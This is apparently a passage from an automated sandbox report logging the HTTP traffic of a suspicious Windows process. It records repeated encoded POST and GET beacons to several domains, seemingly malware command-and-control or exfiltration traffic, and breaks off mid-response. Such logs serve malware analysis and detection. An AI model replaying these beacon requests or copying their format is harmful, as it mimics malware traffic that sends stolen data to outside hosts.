                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:17:21.528525114 CEST  548                IN         HTTP/1.1 404 Not Found
                                              Date: Mon, 01 Jul 2024 14:17:21 GMT
                                              Server: Apache
                                              Content-Length: 389
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                              Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
                                              17          192.168.2.5  49747        74.208.236.72    80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:26.707967043 CEST  782                OUT        POST /edi4/ HTTP/1.1
                                              Host: www.transelva.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.transelva.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.transelva.com/edi4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=AW+t3UbHBFRepIvXUL3LX86mo1guPv3esqBKx7HIeJKF/+dMjnArz1lAabjihqteqkkAKIeuLjCEB3sVLcV0CeWEALcEy7ducm+C47rBE249iEsL0M3FsfgKh2EtKszjw0lBtcC4VCYTQ/Cn4jIIjBqqqpu/6TKu7qbBa2XLLb81R1zxMNAQ9BZE4iq1rzGqMkgP070=
                                              Jul 1, 2024 16:17:27.231482983 CEST | 523 | IN | HTTP/1.1 301 Moved Permanently
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 239
                                              Connection: close
                                              Date: Mon, 01 Jul 2024 14:17:27 GMT
                                              Server: Apache
                                              Location: https://www.transelva.com/edi4/
                                              Cache-Control: max-age=3600
                                              Expires: Mon, 01 Jul 2024 15:17:27 GMT
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.transelva.com/edi4/">here</a>.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              18 | 192.168.2.5 | 49748 | 74.208.236.72 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:17:29.248939991 CEST | 802 | OUT | POST /edi4/ HTTP/1.1
                                              Host: www.transelva.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.transelva.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.transelva.com/edi4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=AW+t3UbHBFReor3XZIvLRc6nt1guAP3asr9Kx/XYf6uF/aRMil4r9VlAdrjdlqtXqkgIKN2uLg+EByQVItV3Q+WGMrcGsLducm+C47vrE2Q9j0cL2ojGh/gJkGEtBMznw0lvtdeSVBsTQ/yn4yIH6xqgupvnwy78xpXdeAi5bIIqQDebWvI4uh18oxiC6DnDWHw/qsix3UwsCHh04eQhdjoeWyd7
                                              Jul 1, 2024 16:17:29.779887915 CEST | 523 | IN | HTTP/1.1 301 Moved Permanently
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 239
                                              Connection: close
                                              Date: Mon, 01 Jul 2024 14:17:29 GMT
                                              Server: Apache
                                              Location: https://www.transelva.com/edi4/
                                              Cache-Control: max-age=3600
                                              Expires: Mon, 01 Jul 2024 15:17:29 GMT
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.transelva.com/edi4/">here</a>.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              19 | 192.168.2.5 | 49749 | 74.208.236.72 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:17:31.777240038 CEST | 1819 | OUT | POST /edi4/ HTTP/1.1
                                              Host: www.transelva.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.transelva.com
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.transelva.com/edi4/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:17:32.310808897 CEST | 523 | IN | HTTP/1.1 301 Moved Permanently
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 239
                                              Connection: close
                                              Date: Mon, 01 Jul 2024 14:17:32 GMT
                                              Server: Apache
                                              Location: https://www.transelva.com/edi4/
                                              Cache-Control: max-age=3600
                                              Expires: Mon, 01 Jul 2024 15:17:32 GMT
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.transelva.com/edi4/">here</a>.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              20 | 192.168.2.5 | 49750 | 74.208.236.72 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:17:34.312062025 CEST | 528 | OUT | GET /edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33wZ0UtxsuR42FNjevCBZMMsNJEJT8RotDqfV3dG69h6TKJk4r6FZf3JTIotB8t00dC+KIgA==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.transelva.com
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:17:34.878957987 CEST | 849 | IN | HTTP/1.1 301 Moved Permanently
                                              Content-Type: text/html; charset=iso-8859-1
                                              Content-Length: 404
                                              Connection: close
                                              Date: Mon, 01 Jul 2024 14:17:34 GMT
                                              Server: Apache
                                              Location: https://www.transelva.com/edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33wZ0UtxsuR42FNjevCBZMMsNJEJT8RotDqfV3dG69h6TKJk4r6FZf3JTIotB8t00dC+KIgA==&3hkl=slNhbLXpBjO8vl
                                              Cache-Control: max-age=3600
                                              Expires: Mon, 01 Jul 2024 15:17:34 GMT
                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.transelva.com/edi4/?4dV43tA=NUWN0h33C1Yyooj/Nqm5TKnDvFAfPsTlu/xXoo6GTaC/958/rmN21lJSbp33wZ0UtxsuR42FNjevCBZMMsNJEJT8RotDqfV3dG69h6TKJk4r6FZf3JTIotB8t00dC+KIgA==&amp;3hkl=slNhbLXpBjO8vl">here</a>.</p></body></html>


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              21 | 192.168.2.5 | 49751 | 192.207.62.21 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:17:40.379960060 CEST | 782 | OUT | POST /8urb/ HTTP/1.1
                                              Host: www.gsdaluan.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.gsdaluan.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.gsdaluan.shop/8urb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=zUz7YQTsJkmMMyU/GGOadvgx710zCoh26yDPNdS9M7ttLxrFNVxkoQbi5tHV0d0EDNO+b2yW6r0z6QDX9GXd5cN5QBGzdt1COiTU6wswlA6PGOPiiprt+BZn8T3CDEMiKHWdG+D+nVALfYlMnthNMjpaxozP5bCzHKfCQxTYJCHkyQT5YKd2jTsGeOqPsuQZCw5Vp1c=
                                              Jul 1, 2024 16:17:40.961719990 CEST | 1195 | IN | HTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:17:40 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Cache-Control: no-cache
                                              Content-Encoding: gzip


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              22 | 192.168.2.5 | 49752 | 192.207.62.21 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:17:42.922319889 CEST | 802 | OUT | POST /8urb/ HTTP/1.1
                                              Host: www.gsdaluan.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.gsdaluan.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.gsdaluan.shop/8urb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=zUz7YQTsJkmMMRM/KFWaI/gynF0zIIhy61LPNZitNN9tLQbFfkxkrQbit9HMwd0fDNDdb3OW6rgz6UPX9Rre4MN7YhGxDd1COiTU6w4KlBSPF9XiiIq7yhZk7T3CHEMcKHWzG/vUnX4LfchMn8hOFjpU1oyC5o7RIqPRVzG5bwDMzm+TCoVewzA+Odi49exwYTpl3iLNw64jo7rXqGAW5gbfYIaX
                                              Jul 1, 2024 16:17:43.529786110 CEST | 1195 | IN | HTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:17:43 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Cache-Control: no-cache
                                              Content-Encoding: gzip


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              23 | 192.168.2.5 | 49753 | 192.207.62.21 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:17:45.466121912 CEST | 1819 | OUT | POST /8urb/ HTTP/1.1
                                              Host: www.gsdaluan.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.gsdaluan.shop
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.gsdaluan.shop/8urb/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:17:46.124095917 CEST | 1195 | IN | HTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:17:46 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Cache-Control: no-cache
                                              Content-Encoding: gzip


                                              Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                              24 | 192.168.2.5 | 49754 | 192.207.62.21 | 80 | 3608 | C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp | Bytes transferred | Direction | Data
                                              Jul 1, 2024 16:17:47.997961044 CEST | 528 | OUT | GET /8urb/?3hkl=slNhbLXpBjO8vl&4dV43tA=+Wbbbk7eLFmMNhAmT0HXUc8arE4mAIhp5z7AS+/8DqhgdhWyAH0zoQfcqO3QhsAMO97HQEWUjr1A2ySQn1zg0/55KGrPENVTP1yAkCUjuBmNS/fntZ3fyi496lnRN2tFRA== HTTP/1.1
                                              Host: www.gsdaluan.shop
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:17:48.596379042 CEST | 1236 | IN | HTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Mon, 01 Jul 2024 14:17:48 GMT
                                              Content-Type: text/html
                                              Transfer-Encoding: chunked
                                              Connection: close
                                              Vary: Accept-Encoding
                                              Cache-Control: no-cache
                                              Data Ascii: 613<!doctype html><html><head><meta charset="utf-8"><title></title><style>*{margin:0;padding:0;color:#444}body{font-size:14px;font-family:""}.main{width:600px;margin:10% auto;}.title{background: #20a53a;color: #fff;font-size: 16px;height: 40px;line-height: 40px;padding-left: 20px;}.content{background-color:#f3f7f9; height:280px;border:1px dashed #c6d9b6;padding:20px}.t1{border-bottom: 1px dashed #c6d9b6;color: #ff4000;font-weight: bold; margin: 0 0 20px; padding-bottom: 18px;}.t2{margin-bottom:8px; font-weight:bold}ol{margin:0 0 20px 22px;padding:0;}ol li{line-height:30px}</style></head><script charset="UTF-8" id="LA_COLLECT" src="//sdk.51.la/js-sdk-pro.min.js"></script><script>LA.init({id:"KPvSogiWixBEEhWI",ck:"KPvSogiWixBEEhWI"})</script><body><div class="main"><div class="title"></div><div class="content"><p class="t1"></p><p class="t2"> [TRUNCATED]
                                              Jul 1, 2024 16:17:48.596417904 CEST  529                IN
                                              Data Ascii: </li></ol><p class="t2"></p><ol><li></li><li></li><li>


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              25          192.168.2.5  49755        199.59.243.226  80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:54.095976114 CEST  794                OUT        POST /k4dg/ HTTP/1.1
                                              Host: www.mommysdaycare.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.mommysdaycare.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 208
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.mommysdaycare.net/k4dg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=qxQlE+lo/kToetsA9bsbjEMsVZwb9qgF4JOo57BCZPB235F9fUkH6xG3t8tA0pNhGKSaksZmPvj9y1WJr4RB9qyxhKiIg311BvoV1kRC2moENgFxHNlZMvZaZSZEFZQVa6zziTbVeGGz9X9lfodAsiDCwGQ3PYPLsilTBSpZKDSzybuXEyBpWRgaY44gwr0LO7g+mbo=
                                              Jul 1, 2024 16:17:54.566551924 CEST  1236               IN         HTTP/1.1 200 OK
                                              date: Mon, 01 Jul 2024 14:17:54 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1134
                                              x-request-id: 924ebff8-6498-4b79-87f9-c8be642bfed3
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==
                                              set-cookie: parking_session=924ebff8-6498-4b79-87f9-c8be642bfed3; expires=Mon, 01 Jul 2024 14:32:54 GMT; path=/
                                              connection: close
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 1, 2024 16:17:54.566566944 CEST  587                IN
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiOTI0ZWJmZjgtNjQ5OC00Yjc5LTg3ZjktYzhiZTY0MmJmZWQzIiwicGFnZV90aW1lIjoxNzE5ODQzND


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              26          192.168.2.5  49756        199.59.243.226  80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:56.643054008 CEST  814                OUT        POST /k4dg/ HTTP/1.1
                                              Host: www.mommysdaycare.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.mommysdaycare.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 228
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.mommysdaycare.net/k4dg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA=qxQlE+lo/kTofN8AtIEblkMza5wbz6gB4JKo55sPZ8l259B9eQ4H5xG34MtJqZN6GKOkkudmPv39y0mJrJRG96y3sqiK9n11BvoV1kF82mwENxVxHu9aS/ZZaSZEP5QJa6zFiSXveDCz9V1lfZdDmiDA0GRTAYHOhhpyGjYHUE2o+ND9eQJBFxMiIrwXhbViUYwO4M+CU0W5KWWzl/04amGI/ZYS
                                              Jul 1, 2024 16:17:57.103627920 CEST  1236               IN         HTTP/1.1 200 OK
                                              date: Mon, 01 Jul 2024 14:17:56 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1134
                                              x-request-id: 0879428c-e794-40fa-8381-9635b759e46c
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==
                                              set-cookie: parking_session=0879428c-e794-40fa-8381-9635b759e46c; expires=Mon, 01 Jul 2024 14:32:57 GMT; path=/
                                              connection: close
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 1, 2024 16:17:57.103652954 CEST  587                IN
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMDg3OTQyOGMtZTc5NC00MGZhLTgzODEtOTYzNWI3NTllNDZjIiwicGFnZV90aW1lIjoxNzE5ODQzND


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              27          192.168.2.5  49757        199.59.243.226  80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:17:59.170070887 CEST  1831               OUT        POST /k4dg/ HTTP/1.1
                                              Host: www.mommysdaycare.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Encoding: gzip, deflate, br
                                              Accept-Language: en-US,en;q=0.9
                                              Origin: http://www.mommysdaycare.net
                                              Cache-Control: no-cache
                                              Connection: close
                                              Content-Length: 1244
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.mommysdaycare.net/k4dg/
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Data Ascii: 4dV43tA= [TRUNCATED]
                                              Jul 1, 2024 16:17:59.644108057 CEST  1236               IN         HTTP/1.1 200 OK
                                              date: Mon, 01 Jul 2024 14:17:59 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1134
                                              x-request-id: d3832461-c60f-41d9-970a-bf206e4c9534
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==
                                              set-cookie: parking_session=d3832461-c60f-41d9-970a-bf206e4c9534; expires=Mon, 01 Jul 2024 14:32:59 GMT; path=/
                                              connection: close
                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_yS6Hx1Qg9xx5kmEUaYHwQfeyvDLHfqkCmBNz2/vxHE4NPGS2vcFUpSiBHRAHFgFwHzbWtObo93Zjpn7eZXAkDQ==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"
                                              Jul 1, 2024 16:17:59.644196987 CEST  587                IN
                                              Data Ascii: > <link rel="preconnect" href="https://www.google.com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiZDM4MzI0NjEtYzYwZi00MWQ5LTk3MGEtYmYyMDZlNGM5NTM0IiwicGFnZV90aW1lIjoxNzE5ODQzND


                                              Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
                                              28          192.168.2.5  49758        199.59.243.226  80                3608  C:\Program Files (x86)\HuaxilgvNMlvjXqnbAUTDSsPYLOkyuWgMOeQybdntYYLGjJr\MqDMLUHvZmSMqiwTfIsHo.exe
                                              Timestamp                            Bytes transferred  Direction  Data
                                              Jul 1, 2024 16:18:01.702274084 CEST  532                OUT        GET /k4dg/?4dV43tA=nz4FHKR3kHD8T7sos5tKkVQRfY182oQFmZOBlJ8PbPlp6eprRQ8g6Bnz+oNd18dyAKSZqsJ9UtPL5lP5nYFy9dCb86j6n0RTbdEdkH9XwmQfMRZVI+dcEtE4XSVBGLRbLA==&3hkl=slNhbLXpBjO8vl HTTP/1.1
                                              Host: www.mommysdaycare.net
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US,en;q=0.9
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
                                              Jul 1, 2024 16:18:02.193284035 CEST  1236               IN         HTTP/1.1 200 OK
                                              date: Mon, 01 Jul 2024 14:18:01 GMT
                                              content-type: text/html; charset=utf-8
                                              content-length: 1518
                                              x-request-id: 6973e5e4-a21a-4873-91da-5ae22c10d7ed
                                              cache-control: no-store, max-age=0
                                              accept-ch: sec-ch-prefers-color-scheme
                                              critical-ch: sec-ch-prefers-color-scheme
                                              vary: sec-ch-prefers-color-scheme
